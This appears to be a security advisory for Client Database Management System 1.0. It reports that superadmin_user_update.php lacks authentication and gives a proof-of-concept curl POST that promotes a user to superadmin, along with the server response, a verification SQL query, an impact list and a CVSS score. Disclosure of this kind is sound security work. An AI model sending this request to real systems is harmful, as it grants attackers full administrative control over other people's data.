Client Database Management System 1.0 - Unauthenticated Privilege Escalation (superadmin_user_update.php)

CDMS-Privilege-Escalation.md

Unauthenticated Privilege Escalation

Client Database Management System 1.0

Vulnerable File

superadmin_user_update.php

---

Description

The file superadmin_user_update.php does not implement any authentication or authorization checks before processing user update requests.

The endpoint directly accepts POST parameters and updates the users table, including the role field.

Because no session validation or role verification is performed, an unauthenticated attacker can modify any user's role.

This allows privilege escalation by promoting a regular user account to superadmin.

---

Proof of Concept (PoC)

An unauthenticated attacker can send:

curl -X POST http://127.0.0.1/cdm/superadmin_user_update.php

-d "user_id=32" -d "firstname=Test" -d "lastname=User" -d "username=testuser" -d "role=superadmin" -d "department_assignment=IT" -d "id_number=ID999"

Server response:

{"status":"success","message":"User updated successfully!"}

---

Verification

After the request, database query:

SELECT user_id, username, role FROM users WHERE user_id=32;

Result:

32 | testuser | superadmin

This confirms privilege escalation without authentication.

---

Impact

An attacker can:

• Escalate privileges to superadmin
• Modify or delete users
• Delete managers
• Manipulate system data
• Gain full administrative control

This results in complete compromise of the system.

---

CVSS v3.1

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Severity: Critical